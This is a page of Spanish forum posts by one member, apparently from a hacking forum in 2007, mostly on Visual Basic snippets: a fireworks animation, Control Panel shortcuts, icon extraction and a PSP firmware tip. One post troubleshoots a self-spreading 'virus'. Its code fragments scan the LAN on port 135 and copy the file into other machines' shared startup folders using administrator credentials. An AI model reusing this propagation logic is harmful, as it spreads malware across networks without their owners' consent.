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Mensajes - Mad Antrax

#741
Cita de: Hexas en 18 Julio 2007, 05:36 AM
yo probe esto en una computadora conectada a otra en red lan, le probe con varias funciones de downloader haber si funka y nada no funka no se movio ni un pelito la otra pc, siempre chekeaba y nada q aparece el uptader.exe en ningun lado supongo q aparece en una carpeta de esas raras con %..., no funciono nada, a lo mejor era el firewall q se reia de mi :xD, q va.. no era el firewall xq lo desactive tambien hasta el antivirus y no funka, y eso de tener activado compartir impresoras ps si esta xq sencillamente mandas a imprimir algo desde esa pc y lo imprime en la pc (la otra) sera q sta mal el codigo¿ o ya hay parche¿ intentare de nuevo..

Uaaaa, ya sé porqué no te funciona. (Ha sido un fallo mio).

Código (vb) [Seleccionar]
For i = 1 To 254                                            'Bucle desde X.X.X.1 hasta X.X.X.254
        If WS.State <> sckClosed Then WS.CloseSck               'Si el Socket no está cerrado, lo cerramos para evitar errores.
        DoEvents                                                'Esperamos...
            WS.Connect SubNet & "." & i, 135                    'Nos conectamos a todos los Hosts de la LAN al puerto 135 TCP (NetBios)
        [b]Sleep 500[/b]                                               'Esperamos 1/2 Segundo...
        If WS.State = sckConnected And i <> MyHost Then         'Si el Hosts es vulnerable y el Host no es MiPC entonces...
            AliveHosts = AliveHosts & i & ","                   '   añadimos el octeto del Host en el Array
        End If                                                  'End If
    Next i


Es por culpa del Sleep, esa función "duerme" todas las acciones del VB, incluido el IF que hay debajo, por eso en algunos equipos el scanning no funcionara del todo bien. Luego mejoro eso.

Otro error...

Código (vb) [Seleccionar]
tmpIP = "\\" & SubNet & "." & tmpArray(i) & "\c$\Documents and Settings\All Users\Menú Inicio\Programas\Inicio"

Se copia en el perfil All Users, ese perfil está como solo lectura para todos los usuarios y escritura para los Administradores. Si el equipo desde donde lanzas el virus no es administrador de los otros equipos no logrará copiarse. En mi caso utilizo un dominio y lo lancé bajo los credenciales de Administrador del Dominio, por eso a mi me ha funcionado y a ti no. Lo he probado en un grupo de trabajo normal y no funciona xD

Este fin de semana me pongo y lo arreglo, ok? Lo siento y saludos!!
#742
Cita de: Tughack en 18 Julio 2007, 03:37 AM
Ok, pero al postear esto hay k poner la fuente y el autor.

Bueno, lo que me faltaba por oir...

1) El source, como bien he dicho en el primer mensaje NO ES MIO, y creo que eso ya ha quedado bastante claro.
2) No puedo citar la fuente original porque ese source me lo pasó un usuario que tengo en el Messenger, ese usuario leyó el primer source de fireworks y me pasó ese, SIN COMENTARIOS, SIN AUTOR Y SIN LA FUENTE!

En resumedas cuentas, me han pasado ese source por MSN, no me dijeron de donde lo sacaron ni nada, y los comentarios del source ya estaban quitados! En ningún momento he dicho que lo haya programado yo, simplemente recibí ese source y lo modifiqué para hacer unos efectos nuevos.




Pero vamos... no quiero discutir más contigo, con mensajes como este demuestras tu rabia y odio hacia mi persona (¿envidi quizás?, no se). Paso de tí y voy a dejar esta disputa como otra más de las que ya he tenido contigo...
#743
Bueno, aquí el remate final. El Source no es mío, la librería usada para el efecto de "niebla" es sencillamente BRUTAL!

1) Mejorado los efectos de niebla
2) Se han añadido nuevas fórmulas matemáticas para simular petardos
3) Funciona con MouseClick o Random
4) Es wapisimo!! xD





Adjunto source y versón compilada.

NO EJECUTAR ESTE SOURCE DIRECTAMENTE DESDE EL VB6, TENÉIS QUE COMPILARLOS (CREAR EL EXE) Y EJECUTARLO DESDE AHÍ. SI LO EJECUTAS DESDE EL VB6 NO FUNCIONA BIEN!




Recomiendo, cuando lo ejecutéis, que pulséis sobre la opción NO y luego hagáis click con el raton encima del cuadro. Saludos!!
#744
Para abrir el Panel de Control de un equipo a mi me gusta usar:

Código (vb) [Seleccionar]
Shell "control"

Con esto te permite abrir los elementos internos, por ejemplo:

Código (vb) [Seleccionar]
Shell "control userpasswords"
#745
Cita de: ActiveSheet en 15 Julio 2007, 23:57 PM
a si esta bien  buen aporte  :P

por cierto ||MadAntrax||

te bajaron de rango?

ahora solo dice Moderador y no Moderador Global

Nombre:     ||MadAntrax||
Título Personalizado:    Lab Member
Mensajes:    1.130 (1,020 por día)
Grupo:    CoAdmin

Aparece Moderador porque soy miembro del grupo de Moderadores de este foro. Pero en realidad soy CoAdmin
#746
iconchanger falla si...

1) el ejecutable está comprimido o empaquetado (UPX por ejemplo)
2) intentas extraer un icono que no está, está currupto...
3) el ejecutable solo tiene iconos de 16.16, falta el 32x32

revisa esos puntos
#747
Aquí tienes un ejemplo que CREO que te funcionará

http://foro.elhacker.net/index.php/topic,159820.0.html

El programa dumpea procesos, en la primera parte del código verás como se obtienen todos los procesos que se están ejecutando. Solo necesitas agregar un FOR para recorrer el listado y buscar el proceso que tu desees.

Saludos!!
#748
Precioso efecto para añadir en nuestro "About Dialog Box" de cualquier aplicación. Lanza petardos y cohetes de forma aleatória y con colores. Utiliza AlphaBending para simular efecto de "petardo"



Ojo, el source no es mio, lo encontré en www.pscode.com como un screensaver, he tenido que modificar bastante el código para dejarlo limpio y listo para usarlo. Sencillamente precioso, no utiliza librerías de DX7 ni DLL''s ni OCX''s

Código (vb) [Seleccionar]
Private Type Particle
    X As Single
    Y As Single
    Xv As Single
    Yv As Single
    Life As Integer
    Dead As Boolean
    Color As Long
End Type

Private Type FireWork
    X As Single
    Y As Single
    Height As Integer
    Color As Long
    Exploded As Boolean
    P() As Particle
End Type

Private Type BLENDFUNCTION
  BlendOp As Byte
  BlendFlags As Byte
  SourceConstantAlpha As Byte
  AlphaFormat As Byte
End Type

Private Declare Function AlphaBlend Lib "msimg32.dll" (ByVal hDC As Long, ByVal lInt As Long, ByVal lInt As Long, ByVal lInt As Long, ByVal lInt As Long, ByVal hDC As Long, ByVal lInt As Long, ByVal lInt As Long, ByVal lInt As Long, ByVal lInt As Long, ByVal BLENDFUNCT As Long) As Long
Private Declare Sub RtlMoveMemory Lib "kernel32.dll" (Destination As Any, Source As Any, ByVal Length As Long)
Private Declare Function SetPixelV Lib "gdi32" (ByVal hDC As Long, ByVal X As Long, ByVal Y As Long, ByVal crColor As Long) As Long

Dim BF As BLENDFUNCTION
Dim lBF As Long

Dim FW() As FireWork
Dim FWCount As Integer
Dim RocketSpeed As Integer

Private Sub StartFireWork()
    For i = 0 To FWCount
        If FW(i).Y = -1 Then
            GoTo MAKEFIREWORK
        End If
    Next i
   
    FWCount = FWCount + 1
   
    ReDim Preserve FW(FWCount)
    i = FWCount
   
MAKEFIREWORK:

    FW(i).X = Int(Rnd * Me.ScaleWidth)
    FW(i).Y = Me.ScaleHeight
    FW(i).Height = Rnd * Me.ScaleHeight
    FW(i).Color = Int(Rnd * vbWhite)
    FW(i).Exploded = False
    ReDim FW(i).P(10)
End Sub

Private Sub DrawFireWork(tFW As FireWork)
    Dim DeadCount As Integer
    Dim RndSpeed As Single
    Dim RndDeg As Single

    With tFW
        If .Exploded Then
            For i = 0 To UBound(.P)
                If .P(i).Life > 0 Then
                    .P(i).Life = .P(i).Life - 1
                    .P(i).X = .P(i).X + .P(i).Xv
                    .P(i).Y = .P(i).Y + .P(i).Yv
                    .P(i).Xv = .P(i).Xv / 1.05
                    .P(i).Yv = .P(i).Yv / 1.05 + 0.05
                    PSet (.P(i).X, .P(i).Y), .P(i).Color
                ElseIf .P(i).Life > -40 Then
                    .P(i).Life = .P(i).Life - 1
                    .P(i).X = .P(i).X + .P(i).Xv + (0.5 - Rnd)
                    .P(i).Y = .P(i).Y + .P(i).Yv + 0.1
                    .P(i).Xv = .P(i).Xv / 1.05
                    .P(i).Yv = .P(i).Yv
                    SetPixelV Me.hDC, .P(i).X, .P(i).Y, .P(i).Color
                Else
                    .P(i).Dead = True
                    DeadCount = DeadCount + 1
                End If
            Next i
           
            If DeadCount >= UBound(.P) Then
                .Y = -1
            End If
        Else
            .Y = .Y - RocketSpeed
            If .Y < .Height Then
                Dim ExplosionShape As Integer
               
                ExplosionShape = Int(Rnd * 6)
               
                Select Case ExplosionShape
                    Case 0 ''Regular
                        ReDim .P(Int(Rnd * 100) + 100)
                       
                        For i = 0 To UBound(.P)
                            .P(i).X = .X
                            .P(i).Y = .Y
                            .P(i).Life = Int(Rnd * 20) + 20
                           
                            RndSpeed = (Rnd * 5)
                            RndDeg = (Rnd * 360) / 57.3
                           
                            .P(i).Xv = RndSpeed * Cos(RndDeg)
                            .P(i).Yv = RndSpeed * Sin(RndDeg)
                            .P(i).Color = .Color
                        Next i
                       
                        .Exploded = True
                    Case 1 ''Smilely
                        ReDim .P(35)
                        ReDim .P(50)
                        ReDim .P(52)
                       
                        For i = 0 To 35
                            .P(i).X = .X
                            .P(i).Y = .Y
                            .P(i).Life = 50
                           
                            .P(i).Xv = 3 * Cos(((360 / 35) * (i + 1)) / 57.3)
                            .P(i).Yv = 3 * Sin(((360 / 35) * (i + 1)) / 57.3)
                            .P(i).Color = .Color
                        Next i
                       
                        For i = 36 To 50
                            .P(i).X = .X
                            .P(i).Y = .Y
                            .P(i).Life = 50
                           
                            .P(i).Xv = 2 * Cos(((360 / 35) * i + 15) / 57.3)
                            .P(i).Yv = 2 * Sin(((360 / 35) * i + 15) / 57.3)
                            .P(i).Color = .Color
                        Next i
                       
                        With .P(51)
                            .X = tFW.X
                            .Y = tFW.Y
                            .Life = 50
                            .Xv = 2 * Cos(-55 / 57.3)
                            .Yv = 2 * Sin(-55 / 57.3)
                            .Color = tFW.Color
                        End With
                       
                        With .P(52)
                            .X = tFW.X
                            .Y = tFW.Y
                            .Life = 50
                            .Xv = 2 * Cos(-125 / 57.3)
                            .Yv = 2 * Sin(-125 / 57.3)
                            .Color = tFW.Color
                        End With
                       
                        .Exploded = True
                    Case 2 ''Star
                        ReDim .P(50)
                       
                        RndDeg = Int(360 * Rnd)
                       
                        For i = 0 To UBound(.P)
                            .P(i).X = .X
                            .P(i).Y = .Y
                            .P(i).Life = 50
                           
                            .P(i).Xv = (i * 0.1) * Cos(((360 / 5) * (i + 1) + RndDeg) / 57.3)
                            .P(i).Yv = (i * 0.1) * Sin(((360 / 5) * (i + 1) + RndDeg) / 57.3)
                            .P(i).Color = .Color
                        Next i
                       
                        .Exploded = True
                    Case 3 ''Spiral
                        ReDim .P(50)
                       
                        RndDeg = (360 * Rnd)
                       
                        For i = 0 To UBound(.P)
                            .P(i).X = .X
                            .P(i).Y = .Y
                            .P(i).Life = 50
                           
                            .P(i).Xv = (i * 0.1) * Cos(((360 / 25) * (i + 1) + RndDeg) / 57.3)
                            .P(i).Yv = (i * 0.1) * Sin(((360 / 25) * (i + 1) + RndDeg) / 57.3)
                            .P(i).Color = .Color
                        Next i
                       
                        .Exploded = True
                    Case 4 ''Regular Random
                       
                        ReDim .P(Int(Rnd * 100) + 100)
                       
                        For i = 0 To UBound(.P)
                            .P(i).X = .X
                            .P(i).Y = .Y
                            .P(i).Life = Int(Rnd * 20) + 20
                           
                            RndSpeed = (Rnd * 5)
                            RndDeg = (Rnd * 360) / 57.3
                           
                            .P(i).Xv = RndSpeed * Cos(RndDeg)
                            .P(i).Yv = RndSpeed * Sin(RndDeg)
                            .P(i).Color = Int(Rnd * vbWhite)
                        Next i
                       
                        .Exploded = True
                End Select
            Else
                SetPixelV Me.hDC, .X, .Y, vbWhite
            End If
        End If
    End With
End Sub

Private Sub Form_KeyPress(KeyAscii As Integer)
    End
End Sub

Private Sub Form_Load()
    Randomize

    RocketSpeed = Int(Rnd * 4) + 2
    FWCount = -1
   
    BF.BlendOp = &H0
    BF.BlendFlags = 0
    BF.AlphaFormat = 0
End Sub

Private Sub Timer1_Timer()
    For i = 0 To FWCount
        DrawFireWork FW(i)
    Next i

    RtlMoveMemory lBF, BF, 4
    AlphaBlend Me.hDC, 0, 0, Me.ScaleWidth, Me.ScaleHeight, Picture1.hDC, 0, 0, Picture1.ScaleWidth, Picture1.ScaleHeight, lBF
    Me.Refresh
End Sub

Private Sub Timer2_Timer()
    StartFireWork
    BF.SourceConstantAlpha = Int(Rnd * 25)
    Timer2.Interval = Int(Rnd * 500)
    Label1.ForeColor = FW(i).Color
End Sub



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#749
Juegos y Consolas / Re: ¿que PSP me compro?
15 Julio 2007, 17:18 PM
Si no quieres cagarla antes de comprarte una PSP hay un truco para averiguar que versión de firmware te encontrarás SIN ABRIR LA CAJA, solo mirando el código de barras.



Yo cuando me la compré era una H (2.50) y me fue de maravilla.

Saludos!!
#750
Si, yo al menos me he fijado, también ocurre que si escribimos el caracter "\" desaparece.

Para hacer que aparezca hay que escribirlo 2 veces seguidas, curioso, no?